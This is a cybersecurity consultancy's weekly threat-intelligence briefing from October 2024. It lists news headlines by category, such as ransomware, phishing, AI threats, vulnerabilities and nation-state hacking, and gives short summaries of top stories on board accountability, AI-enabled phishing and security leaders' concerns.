More Ransoms Being Paid and More Data Being Lost: Hornetsecurity - Security Boulevard

RansomHub becomes dominant ransomware group in Q3 2024 (securitybrief.co.nz)

Basic cyber hygiene still offers the best defence against ransomware | SC Media (scworld.com)

53% of survey respondents admit to paying over $500,000 ransom | Security Magazine

Are You Prepared for Ransomware IRL? - Security Boulevard

Ransomware Attacks Tripled for Microsoft Customers Last Year (tech.co)

Ransomware operators exploited Veeam Backup & Replication flaw CVE-2024-40711 in recent attacks (securityaffairs.com)

Supply chain vulnerabilities are facilitating a surge in ransomware | TechRadar

Would banning ransomware insurance stop the scourge? • The Register

Schools under siege: from nation-states to ransomware gangs • The Register

99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)

Ransomware Threats Surge with 31 New Groups in 2024 (techinformed.com)

Ransomware still a major threat despite disruption to RaaS groups (betanews.com)

Rampant ransom payments highlight need for urgent action on cyber resiliency | TechRadar

Cicada3301 Ransomware Targets Critical Sectors in US and UK - Infosecurity Magazine (infosecurity-magazine.com)

Akira, Fog Ransomware Leverages Critical Veeam RCE | MSSP Alert

INC ransomware rebranded to Lynx, say security researchers • The Register

Ransomware Victims

53% of survey respondents admit to paying over $500,000 ransom | Security Magazine

How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)

Casio Confirms Ransomware Outage and Data Breach - Infosecurity Magazine (infosecurity-magazine.com)

Volkswagen Says IT Infrastructure Not Affected After Ransomware Gang Claims Data Theft - SecurityWeek

Schools under siege: from nation-states to ransomware gangs • The Register

Cicada3301 Ransomware Targets Critical Sectors in US and UK - Infosecurity Magazine (infosecurity-magazine.com)

Casio says 'no prospect of recovery yet' after ransomware attack | TechCrunch

Nearly 400 US healthcare institutions hit with ransomware over last year, Microsoft says (therecord.media)

India’s biggest health insurer gets ransomware following data breach | TechRadar

Hackers blackmail Globe Life after stealing customer data (bleepingcomputer.com)

BianLian ransomware claims attack on Boston Children's Health Physicians (bleepingcomputer.com)

Phishing & Email Based Attacks

How AI created an email security gap | SC Media (scworld.com)

Attackers are using QR codes sneakily crafted in ASCII and blob URLs in phishing emails | CSO Online

70% of senior executives targeted by cyber attack in past 18 months, new study reveals (proactiveinvestors.com.au)

Here’s how attackers are getting around phishing defences | CyberScoop

Phishing tactics: The top attacks trends in 2024 | ITPro

Over 90% of phishing campaigns lead victims to malware | Security Magazine

Chinese and Iranian hackers use ChatGPT and LLM tools to create malware and phishing attacks — OpenAI report has recorded over 20 cyber attacks created with ChatGPT | Tom's Hardware (tomshardware.com)

Microsoft consultant says 2.5 billion Gmail users could fall victim to a "super realistic AI scam" | Windows Central

99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)

Be Aware of These Eight Underrated Phishing Techniques - SecurityWeek

Someone Just Lost $35 Million Worth of Crypto After Falling for This Phishing Scam

Coffee Lovers Warned of New Starbucks Phishing Scam - Infosecurity Magazine (infosecurity-magazine.com)

Business Email Compromise (BEC)/Email Account Compromise (EAC)

70% of senior executives targeted by cyber attack in past 18 months, new study reveals (proactiveinvestors.com.au)

Other Social Engineering

70% of senior executives targeted by cyber attack in past 18 months, new study reveals (proactiveinvestors.com.au)

Firm hacked after accidentally hiring North Korean cyber criminal - BBC News

North Korea Escalates Fake IT Worker Schemes to Extort Employers - Infosecurity Magazine (infosecurity-magazine.com)

'They fall in love with me': Inside the fraud factories driving the online scam boom | World News | Sky News

99% of UK Businesses Faced Cyber Attacks in the Last Year (techrepublic.com)

Scammers use AI to create convincing Gmail phishing calls (appleinsider.com)

What is tailgating (piggybacking) and how to prevent it? | Definition from TechTarget

Alabama man arrested for role in SEC Twitter account hijacking | CyberScoop

Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI

Coffee Lovers Warned of New Starbucks Phishing Scam - Infosecurity Magazine (infosecurity-magazine.com)

Artificial Intelligence

How AI created an email security gap | SC Media (scworld.com)

70% of senior executives targeted by cyber attack in past 18 months, new study reveals (proactiveinvestors.com.au)

OpenAI Says Bad Actors Are Using ChatGPT To Write Malware, Sway Elections (informationsecuritybuzz.com)

From Misuse to Abuse: AI Risks and Attacks (thehackernews.com)

World Economic Forum: AI, Quantum Require ‘Paradigm Shift’ in Security - Security Boulevard

What Is Deepfake Technology? Ultimate Guide To AI Manipulation (eweek.com)

Chinese and Iranian hackers use ChatGPT and LLM tools to create malware and phishing attacks — OpenAI report has recorded over 20 cyber attacks created with ChatGPT | Tom's Hardware (tomshardware.com)

AI is bringing XSS vulnerabilities back to the spotlight | CSO Online

Microsoft consultant says 2.5 billion Gmail users could fall victim to a "super realistic AI scam" | Windows Central

Navigating the Cyber Security Risks of Shadow & Open-Source GenAI - Security Boulevard

New ConfusedPilot Attack Targets AI Systems with Data Poisoning - Infosecurity Magazine (infosecurity-magazine.com)

LLMs Are a New Type of Insider Adversary (darkreading.com)

Over 80 percent of hackers believe the AI threat landscape is moving too fast to secure (betanews.com)

Anthropic flags AI's potential to 'automate sophisticated destructive cyber attacks' | ZDNET

Deepfake lovers swindle victims out of $46M in Hong Kong AI scam - Ars Technica

What are digital arrests, the newest deepfake tool used by cyber criminals? | Science and Technology News | Al Jazeera

AI Report Finds 74% of Cyber Security Leaders Aware of Sensitive Data Risks | Business Wire

AI data collection under fire - Help Net Security

4 Frightening Things Coming For Security This Season (informationsecuritybuzz.com)

How to Mitigate the Impact of Rogue AI Risks | Trend Micro (US)

Government Launches AI Safety Scheme to Tackle Deepfakes - Infosecurity Magazine (infosecurity-magazine.com)

NY's Financial Regulator Releases AI Cyber Security Guidance - Law360

AI Companies Are Not Meeting EU AI Act Standards (informationsecuritybuzz.com)

2FA/MFA

Cyber Crime Agency Issues New 2FA Warning For Gmail, Outlook, Facebook And X Users (forbes.com)

Malware

OpenAI Says Bad Actors Are Using ChatGPT To Write Malware, Sway Elections (informationsecuritybuzz.com)

Over 90% of phishing campaigns lead victims to malware | Security Magazine

Two-thirds of Attributable Malware Linked to Nation States - Infosecurity Magazine (infosecurity-magazine.com)

OpenAI confirms threat actors use ChatGPT to write malware (bleepingcomputer.com)

New Malware Campaign Uses PureCrypter Loader to Deliver DarkVision RAT (thehackernews.com)

New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)

Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)

Researchers Uncover Hijack Loader Malware Using Stolen Code-Signing Certificates (thehackernews.com)

New FASTCash malware Linux variant helps steal money from ATMs (bleepingcomputer.com)

Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Attack (thehackernews.com)

Fake Google Meet pages deliver infostealers - Help Net Security

Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI

Bots/Botnets

How DDoS Botnet is used to Infect your Network? - Security Boulevard

Mobile

Over 200 malicious apps on Google Play downloaded millions of times (bleepingcomputer.com)

Which? warns UK users to keep mobile numbers to avoid security risks - Neowin

TrickMo’s Latest Trick - Stealing PINs And Unlock Patterns (informationsecuritybuzz.com)

The hidden risks of IoT: Why businesses need to modernize mobile security | TechRadar

Cerberus Android Banking Trojan Deployed in New Malicious Campaign - Infosecurity Magazine (infosecurity-magazine.com)

Android banking trojan stealing money: no antivirus software can detect it | Cybernews

What to do if your iPhone or Android smartphone gets stolen? - Help Net Security

Not iPhones, but secure Android phones: that's what Trump's campaign uses - PhoneArena

Trump campaign gets 'unhackable' phones • The Register

Denial of Service/DoS/DDoS

A Deep Dive into DDoS Carpet-Bombing Attacks - Security Boulevard

How DDoS Botnet is used to Infect your Network? - Security Boulevard

Independent Russian news site rides out a week of DDoS incidents (therecord.media)

Largest DDoS Cloudflare Attack On Global Sectors Mitigated - Security Boulevard

Internet of Things – IoT

Hackers took over robovacs to chase pets and yell slurs - The Verge

Hackers Made Robot Vacuums Shout Racist Slurs in Their Owners’ Homes (pcmag.com)

The hidden risks of IoT: Why businesses need to modernize mobile security | TechRadar

Organisations Slow to Protect Doors Against Hackers: Researcher - SecurityWeek

Speakers, vacuums, doorbells and fridges – the government plans to make your ‘smart things’ more secure (theconversation.com)

Data Breaches/Leaks

Data breaches trigger increase in cyber insurance claims - Help Net Security

Volkswagen Says IT Infrastructure Not Affected After Ransomware Gang Claims Data Theft - SecurityWeek

Cyber attack on TfL disrupts taxi licensing leaving some cabbies unlicensed and unable work, says trade rep (taxi-point.co.uk)

Cisco investigates breach after stolen data for sale on hacking forum (bleepingcomputer.com)

Data Breaches: The Not-So-Hidden Cost of Doing Business | Baker Donelson - JDSupra

Fidelity Investments Data Breach Impacts 77,000 Customers - SecurityWeek

US healthcare org admits up to 400k people's data stolen • The Register

Cisco confirms ongoing probe into alleged data breach • The Register

Contractor pays $300K to settle Medicare data breach • The Register

Casio confirms customer data stolen in a ransomware attack (bleepingcomputer.com)

Hackers blackmail Globe Life after stealing customer data (bleepingcomputer.com)

Hackers may have access to personal details of thousands of customers after debt collection firm attacked | Irish Independent

Game Freak Confirms 1TB Data Leaked in Breach | MSSP Alert

Hundreds of thousands of CVs leaked - here's what we know | TechRadar

Organised Crime & Criminal Actors

Microsoft wants tougher punishments for cyber criminals • The Register

Cyber crime's constant rise is becoming everyone's problem - Help Net Security

Southeast Asian Cyber Crime Profits Fuel Shadow Economy (darkreading.com)

The internet is now a "cyber storm" — Microsoft says customers face 600 million attacks per day and the lines between nation states and cyber criminals are blurring | TechRadar

Microsoft logs 600 million identity attacks per day as threat actors collaborate more | ITPro

Escalating Cyber Threats Demand Stronger Global Defence and Cooperation - Microsoft On the Issues

The Wiretap: Microsoft Says Kremlin Is Working With Cyber Criminals To Spy On Ukraine (forbes.com)

Microsoft: Nation-States Team Up with Cyber Criminals for Attacks - Infosecurity Magazine (infosecurity-magazine.com)

Cyber Gangs Aren't Afraid of Prosecution (darkreading.com)

Brazilian Police Arrest Notorious Hacker USDoD - SecurityWeek

Two alleged operators of Anonymous Sudan named, charged • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Someone Just Lost $35 Million Worth of Crypto After Falling for This Phishing Scam

North Korean hackers steal $3B in crypto since 2017: report | Invezz

Radiant Capital Suffers $50M Loss in Second Major Hack - DailyCoin

Insider Risk and Insider Threats

October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Program | Clark Hill PLC - JDSupra

The NHI management challenge: When employees leave - Help Net Security

LLMs Are a New Type of Insider Adversary (darkreading.com)

Insurance

Would banning ransomware insurance stop the scourge? • The Register

Data breaches trigger increase in cyber insurance claims - Help Net Security

Insurers brace for cyber evolution: 'It's like mandating seatbelts and airbags' | Insurance Business America (insurancebusinessmag.com)

Supply Chain and Third Parties

Supply chain vulnerabilities are facilitating a surge in ransomware | TechRadar

How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)

Cyber Security Experts Brace for the Next Crisis After the CrowdStrike Near-Disaster - ClearanceJobs

Supply Chain Attacks Can Exploit Entry Points in Python, npm, and Open-Source Ecosystems (thehackernews.com)

UK Public sector at risk from supply chain attacks, new report warns | ITPro

Cloud/SaaS

Why are we still confused about cloud security? | InfoWorld

Why companies are struggling to keep up with SaaS data protection - Help Net Security

Tenable releases report on cloud security (devx.com)

38% of organisations are at risk of critical exposures | Security Magazine

Cyber Crime Agency Issues New 2FA Warning For Gmail, Outlook, Facebook And X Users (forbes.com)

Outages

Cyber Security Experts Brace for the Next Crisis After the CrowdStrike Near-Disaster - ClearanceJobs

Resilience over reliance: Preparing for IT failures in an unpredictable digital world - Help Net Security

Identity and Access Management

The Invisible Army of Non-Human Identities (darkreading.com)

Microsoft's guidance to help mitigate Kerberoasting | Microsoft Security Blog

Kerberoasting: A Gateway to Privilege Escalation in Enterprise Networks | HackerNoon

The NHI management challenge: When employees leave - Help Net Security

NHIs may be your biggest — and most neglected — security hole | CSO Online

Orgs With SSO Are Vulnerable to Identity-Based Attacks (darkreading.com)

Encryption

Chinese Scientists Report Using Quantum Computer to Hack Military-grade Encryption (thequantuminsider.com)

The CISO’s guide to establishing quantum resilience | CSO Online

Most Organisations Unprepared for Post-Quantum Threat - Infosecurity Magazine (infosecurity-magazine.com)

The quantum dilemma: Game-changer or game-ender - Help Net Security

Chinese researchers claim quantum encryption attack • The Register

Linux and Open Source

New FASTCash malware Linux variant helps steal money from ATMs (bleepingcomputer.com)

Passwords, Credential Stuffing & Brute Force Attacks

How Hybrid Password Attacks Work and How to Defend Against Them (thehackernews.com)

The War on Passwords Is One Step Closer to Being Over | WIRED

FIDO Alliance is Standardizing Passkey Portability - Thurrott.com

Understand these seven password attacks and how to stop them (bleepingcomputer.com)

Iranian hackers are going after critical infrastructure sector passwords, agencies caution | CyberScoop

Feeling safe with that complicated password? Think again, security experts say - complexity affects memorability and fosters unsafe practices | ITPro

Are Password Managers Safe to Use? (Benefits, Risks & Best Practices) (techrepublic.com)

Social Media

EU Court Restricts Meta's Use Of Facebook Data For Targeted Advertising (informationsecuritybuzz.com)

Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI

Training, Education and Awareness

October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Program | Clark Hill PLC - JDSupra

Regulations, Fines and Legislation

NIS2 Confusion: Concerns Over Readiness as Deadline Reached - Infosecurity Magazine (infosecurity-magazine.com)

NIS2: Most EU countries miss deadline to meet new cyber security rules (cnbc.com)

EU cyber security bill NIS2 hits compliance deadline | Computer Weekly

European companies anxious over non-implementation of EU cyber rules | Euronews

What is the NIS2 Directive and Why Now? - Infosecurity Magazine (infosecurity-magazine.com)

NIS 2 Compliance Deadline Approaches: What You Need To Know (techrepublic.com)

Huge number of businesses not ready for new EU cyber security laws (businessplus.ie)

Ireland to miss EU cyber security deadline (rte.ie)

Are Irish businesses ready for new cyber security rules? (rte.ie)

Only two EU countries meet NIS2 deadline - TechCentral.ie

Is your organisation ready for NIS2? | Intel 471

Navigating the New Cyber Security Landscape: Key Implications of the EU’s NIS 2 Directive | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

How NIS2 will impact sectors from healthcare to energy - Help Net Security

Ex-NCSC Chief: UK Cyber Incident Reporting a 'Good Step' (govinfosecurity.com)

Contractor pays $300K to settle Medicare data breach • The Register

AI Companies Are Not Meeting EU AI Act Standards (informationsecuritybuzz.com)

New Cyber Security Rules Threaten Defence Industrial Base - Law360

Speakers, vacuums, doorbells and fridges – the government plans to make your ‘smart things’ more secure (theconversation.com)

NY's Financial Regulator Releases AI Cyber Security Guidance - Law360

Models, Frameworks and Standards

EU cyber security bill NIS2 hits compliance deadline | Computer Weekly

European companies anxious over non-implementation of EU cyber rules | Euronews

What is the NIS2 Directive and Why Now? - Infosecurity Magazine (infosecurity-magazine.com)

NIS2: Most EU countries miss deadline to meet new cyber security rules (cnbc.com)

Huge number of businesses not ready for new EU cyber security laws (businessplus.ie)

Only two EU countries meet NIS2 deadline - TechCentral.ie

Is your organisation ready for NIS2? | Intel 471

Navigating the New Cyber Security Landscape: Key Implications of the EU’s NIS 2 Directive | Skadden, Arps, Slate, Meagher & Flom LLP - JDSupra

NIS2 Directive: Experts share their views on the cyber security law (telecomstechnews.com)

How NIS2 will impact sectors from healthcare to energy - Help Net Security

Data Protection

CISOs' Privacy Responsibilities Keep Growing (darkreading.com)

Is a CPO Still a CPO? Privacy Leadership's Evolving Role (darkreading.com)

Careers, Working in Cyber and Information Security

CISSP and CompTIA Security+ lead as most desired security credentials - Help Net Security

The Cyber Security Burnout Crisis Is Reaching The Breaking Point (forbes.com)

Breaking into Cyber Security: It's Never Too Late - IT Security Guru

A quarter of cyber security leaders are ready to quit (betanews.com)

Stagnant salaries risk growth of infosec sector | The Global Recruiter

Security leaders can't catch a break, with many on the verge of quitting | TechRadar

Five alternative paths to the CISO chair | SC Media (scworld.com)

Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)

Cyber Security Careers Go Beyond Coding | NIST

Skills Shortages Now a Top-Two Security Risk for SMBs - Infosecurity Magazine (infosecurity-magazine.com)

SMBs are being hit hardest by cyber security skills gap | TechRadar

Law Enforcement Action and Take Downs

Dutch police dismantled dual dark web market 'Bohemia/Cannabia' (securityaffairs.com)

Cyber Gangs Aren't Afraid of Prosecution (darkreading.com)

Brazilian Police Arrest Notorious Hacker USDoD - SecurityWeek

Two alleged operators of Anonymous Sudan named, charged • The Register

Alabama man arrested for role in SEC Twitter account hijacking | CyberScoop

Teenagers as young as 13 under suspicion for UK far-right terrorism | UK security and counter-terrorism | The Guardian

Microsoft wants tougher punishments for cyber criminals • The Register

Misinformation, Disinformation and Propaganda

OpenAI Says Bad Actors Are Using ChatGPT To Write Malware, Sway Elections (informationsecuritybuzz.com)

How nation-states exploit political instability to launch cyber operations - Help Net Security

Darknet Activity Increases Ahead of 2024 Presidential Vote - Infosecurity Magazine (infosecurity-magazine.com)

Flood of Election-Related Cyber Activity Unleashed (darkreading.com)


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Nation-State Cyber Threats: The Hidden War on Infrastructure - Security Boulevard

Escalation of Cyber Warfare in the Israel-Palestine Conflict: A Deep Dive into Recent Israeli Breaches - Security Boulevard

Nation State Actors

How nation-states exploit political instability to launch cyber operations - Help Net Security

Gap Between Cyber Threats And Defences ‘Widening’, Cyber Security Chief Warns - PM Today

UK Reports 50% Spike in 'Nationally Significant' Incidents (inforisktoday.com)

Two-thirds of Attributable Malware Linked to Nation States - Infosecurity Magazine (infosecurity-magazine.com)

'Nationally significant' cyber attacks are surging, warns the UK's new cyber chief (therecord.media)

Cyber Threats Escalating Beyond Ability to Defend, New NCSC Head Warns - Infosecurity Magazine (infosecurity-magazine.com)

Schools under siege: from nation-states to ransomware gangs • The Register

China

Meet the Chinese 'Typhoon' hackers preparing for war | TechCrunch

China Accuses US of Fabricating Volt Typhoon to Hide Its Own Hacking Campaigns (thehackernews.com)

US lawmakers demand probe into China's Salt Typhoon hacks • The Register

White House forms emergency team to deal with China espionage hack | Stars and Stripes

Chinese and Iranian hackers use ChatGPT and LLM tools to create malware and phishing attacks — OpenAI report has recorded over 20 cyber attacks created with ChatGPT | Tom's Hardware (tomshardware.com)

Serious Adversaries Circle Ivanti CSA Zero-Day Flaws (darkreading.com)

UK Fears Chinese Hackers Compromised Critical Infrastructure (bloomberglaw.com)

Chinese Scientists Report Using Quantum Computer to Hack Military-grade Encryption (thequantuminsider.com)

Chinese State Hackers Main Suspect in Recent Ivanti CSA Zero-Day Attacks - SecurityWeek

Chinese researchers claim quantum encryption attack • The Register

Czech opposition MP, who criticizes cyber security law, met Huawei leadership in China | Radio Prague International

Intel denies Chinese claims it helps US intelligence orgs • The Register

China trade group claims Intel ignore... - Mobile World Live

China infosec body slams Intel over chip security • The Register

Russia

Agencies warn about Russian government hackers going after unpatched vulnerabilities | CyberScoop

How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)

Russia-linked group APT29 is targeting Zimbra and JetBrains TeamCity servers on a large scale (securityaffairs.com)

Russia is actively scanning everything for known vulns • The Register

Iran, Russia and North Korea changed cyber attack tactics in the last year, says Microsoft | Science & Tech News | Sky News

The Wiretap: Microsoft Says Kremlin Is Working With Cyber Criminals To Spy On Ukraine (forbes.com)

Microsoft: Nation-States Team Up with Cyber Criminals for Attacks - Infosecurity Magazine (infosecurity-magazine.com)

NCCC and Council of Europe held a forum on electronic evidence and OSINT in the context of documenting war crimes of Russia - National Security and Defence Council of Ukraine (rnbo.gov.ua)

Uncle Sam puts $10M bounty on Russian troll farm Rybar • The Register

Independent Russian news site rides out a week of DDoS incidents (therecord.media)

The Door Closes on Kaspersky: Russia’s Tech World-Beater - CEPA

Russian court websites down after breach claimed by pro-Ukraine hackers (therecord.media)

Iran

Chinese and Iranian hackers use ChatGPT and LLM tools to create malware and phishing attacks — OpenAI report has recorded over 20 cyber attacks created with ChatGPT | Tom's Hardware (tomshardware.com)

Iran, Russia and North Korea changed cyber attack tactics in the last year, says Microsoft | Science & Tech News | Sky News

Report: Iran cyber attacks against Israel surge after Gaza war (voanews.com)

Iranian hackers are going after critical infrastructure sector passwords, agencies caution | CyberScoop

Escalation of Cyber Warfare in the Israel-Palestine Conflict: A Deep Dive into Recent Israeli Breaches - Security Boulevard

Iran's APT34 Abuses MS Exchange (darkreading.com)

A cyber attack hit Iranian government sites and nuclear facilities (securityaffairs.com)

North Korea

Firm hacked after accidentally hiring North Korean cyber criminal - BBC News

Iran, Russia and North Korea changed cyber attack tactics in the last year, says Microsoft | Science & Tech News | Sky News

North Korea Escalates Fake IT Worker Schemes to Extort Employers - Infosecurity Magazine (infosecurity-magazine.com)

North Korean hackers steal $3B in crypto since 2017: report | Invezz

Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Teenagers as young as 13 under suspicion for UK far-right terrorism | UK security and counter-terrorism | The Guardian


Tools and Controls

Despite massive security spending, 44% of CISOs fail to detect breaches - Help Net Security

The Invisible Army of Non-Human Identities (darkreading.com)

SOC Teams: Threat Detection Tools Are Stifling Us (darkreading.com)

Microsoft's guidance to help mitigate Kerberoasting | Microsoft Security Blog

Kerberoasting: A Gateway to Privilege Escalation in Enterprise Networks | HackerNoon

The dark side of API security - Help Net Security

Organisations Slow to Protect Doors Against Hackers: Researcher - SecurityWeek

FIDO Alliance is Standardizing Passkey Portability - Thurrott.com

New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)

Resilience over reliance: Preparing for IT failures in an unpredictable digital world - Help Net Security

CIOs want a platform that combines AI, networking, and security - Help Net Security

Why Continuous API Security is Essential for Modern Businesses - Security Boulevard

NHIs may be your biggest — and most neglected — security hole | CSO Online

Why companies are struggling to keep up with SaaS data protection - Help Net Security

Rampant ransom payments highlight need for urgent action on cyber resiliency | TechRadar

Return on cyber investment | Professional Security Magazine

Orgs With SSO Are Vulnerable to Identity-Based Attacks (darkreading.com)

Hybrid Work Exposes New Vulnerabilities in Print Security (darkreading.com)

Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)

What is Business Continuity Plan? How it Works! (cybersecuritynews.com)

Secure by Design: The (Necessary) Future of Hardware and Software - IT Security Guru

Finance and Insurance API Security: A Critical Imperative - Security Boulevard

Human Resources’ Role in Data Privacy and Cyber Security, Part II: Assessing Five Key Areas of Risk | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

While Cyber Attacks Are Inevitable, Resilience Is Vital (automation.com)

Ethical Hackers Embrace AI Tools Amid Rising Cyber Threats - Infosecurity Magazine (infosecurity-magazine.com)

CISOs' strategies for managing a growing attack surface - Help Net Security




Vulnerability Management

Agencies warn about Russian government hackers going after unpatched vulnerabilities | CyberScoop

Google: 70% of exploited flaws disclosed in 2023 were zero-days (bleepingcomputer.com)

Russia is actively scanning everything for known vulns • The Register

Patch-22: The Catch of Waiting to Fix Cyber Security Vulnerabilities - Security Boulevard

How to defend against zero-day vulnerabilities | TechRadar

The Rise of Zero-Day Vulnerabilities: Why Traditional Security Solutions Fall Short (thehackernews.com)

Organisations can substantially lower vulnerabilities with secure-by-design practices, report finds | CyberScoop

Secure by Design: The (Necessary) Future of Hardware and Software - IT Security Guru

Zero-Days Account for Most Exploited Bugs in 2023 | MSSP Alert

Vulnerabilities

86k Fortinet devices still vulnerable to active exploits • The Register

WordPress Plugin Jetpack Patches Major Vulnerability Affecting 27 Million Sites (thehackernews.com)

Ransomware operators exploited Veeam Backup & Replication flaw CVE-2024-40711 in recent attacks (securityaffairs.com)

Oracle Patches Over 200 Vulnerabilities With October 2024 CPU - SecurityWeek

Russia-linked group APT29 is targeting Zimbra and JetBrains TeamCity servers on a large scale (securityaffairs.com)

Windows 11 bug steals 8.63GB of storage space that you can't get back | Windows Central

Windows 11's 2024 update is now also killing internet connections | PCWorld

Juniper Networks Patches Dozens of Vulnerabilities - SecurityWeek

Serious Adversaries Circle Ivanti CSA Zero-Day Flaws (darkreading.com)

Akira, Fog Ransomware Leverages Critical Veeam RCE | MSSP Alert

Splunk Enterprise Update Patches Remote Code Execution Vulnerabilities - SecurityWeek

Vulnerable instances of Log4j still being used nearly 3 years later | SC Media (scworld.com)

Microsoft Patches Vulnerabilities in Power Platform, Imagine Cup Site - SecurityWeek

VMware fixes high-severity SQL injection CVE-2024-38814 in HCX (securityaffairs.com)

SolarWinds hardcoded credential now exploited in the wild • The Register

Fortinet Edge Devices Under Attack - Again - InfoRiskToday

Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)

Cisco Patches High-Severity Vulnerabilities in Analog Telephone Adapters - SecurityWeek

F5 BIG-IP Updates Patch High-Severity Elevation of Privilege Vulnerability - SecurityWeek

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)

Mozilla releases second Firefox 131 security update - gHacks Tech News

Recent Firefox Zero-Day Exploited Against Tor Browser Users - SecurityWeek

Chrome 130 Released with Fix for 17 Security Flaws (cybersecuritynews.com)

GitHub Patches Critical Flaw in Enterprise Server Allowing Unauthorized Instance Access (thehackernews.com)

CISA Warns of Active Exploitation in SolarWinds Help Desk Software Vulnerability (thehackernews.com)

Chinese State Hackers Main Suspect in Recent Ivanti CSA Zero-Day Attacks - SecurityWeek

Iran's APT34 Abuses MS Exchange (darkreading.com)

Critical Kubernetes Image Builder Vulnerability Exposes Nodes to Root Access Risk (thehackernews.com)

Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser (thehackernews.com)

Netgear WiFi Extender Vulnerability Let Attackers Inject Malicious Commands - Cyber Security News


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Briefing 11 October 2024

Black Arrow Cyber Threat Intelligence Briefing 11 October 2024:

-Your IT Systems Are Being Attacked. Are You Prepared?

-Board-CISO Mismatch on Cyber Responsibility, NCSC Research Finds

-Mounting Phishing Attacks Enabled by AI, Deepfakes

-AI is Most Serious Threat to Orgs, According to Security Professionals

-MI5 Chief Warns of Cyber Threats to the UK

-Walking the Tightrope Between Innovation and Risk

-Ransomware Severity Up 68% in First Half of 2024

-31 New Ransomware Groups in 12 Months

-Lack of Cyber Risk Quantification Leaves Companies Financially Exposed: PwC Report

-Software Supply Chain Weaknesses are Increasingly Putting Businesses at Risk

-UK Businesses Cite Economic Risks and Cyber Crime as Top 2024 Concerns: Marsh McLennan

-Cloud Security Risks Surge as 38% of Firms Face Exposures

-Insider Threat Damage Balloons as Visibility Gaps Widen

Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber related news from the last week.

Top Cyber Stories of the Last Week

Your IT Systems Are Being Attacked. Are You Prepared?

Recent cyber attacks are becoming more frequent and sophisticated, emphasising the need for executive-level engagement in cyber security. Yet many organisations remain unprepared, with CEOs often delegating responsibility to IT departments. A survey revealed that while increasing AI use is expected to lead to more breaches, four in five security officers plan to use AI for defence. Experts advise that CEOs should actively participate in cyber security planning, ask critical questions like 'What are we doing? Is it enough? How do we know?', and regularly review measures to avoid significant business disruptions and regulatory penalties.

Board-CISO Mismatch on Cyber Responsibility, NCSC Research Finds

The UK's National Cyber Security Centre (NCSC) has found that 80% of board members and security leaders are uncertain about who holds responsibility for cyber security in their organisations. This confusion stems from CISOs believing accountability lies with the board, while board members think it rests with CISOs. The NCSC's research highlighted that many board members lack in-depth cyber knowledge, leading to gaps in oversight. In response, the NCSC has published new guidance to help CISOs effectively communicate with boards, aiming to bridge this gap and reduce cyber risk across organisations.

Mounting Phishing Attacks Enabled by AI, Deepfakes

A recent report has found that phishing attacks increased by 28% between the first and second quarters of 2024. Of the phishing kits used, 75% leveraged artificial intelligence and 82% incorporated deepfake capabilities. 44% of the attacks between April and June exploited compromised email accounts, with 8% originating from supply chain accounts. Hyperlinks were identified as the most common attack payload, followed by attachments. The report highlighted that attackers' use of AI in phishing toolkits lowers the barrier to entry for cyber attacks. It emphasised the need for organisations to adopt AI-based defences where they add value, while avoiding the introduction of new weaknesses through deploying AI where it is not needed.

AI is Most Serious Threat to Orgs, According to Security Professionals

Keeper Security has found that AI-driven cyber threats are now the most serious concern for organisations, with 51% of security leaders identifying them as such. Despite 81% of organisations implementing AI usage policies and 77% of leaders being familiar with AI security best practices, 35% feel least prepared to combat AI-powered attacks compared to other cyber threats. The survey also highlighted that 84% of IT and security leaders find AI-powered tools have made phishing and smishing attacks harder to detect. Organisations are prioritising data encryption, employee training, and advanced threat detection systems to counter these evolving threats.

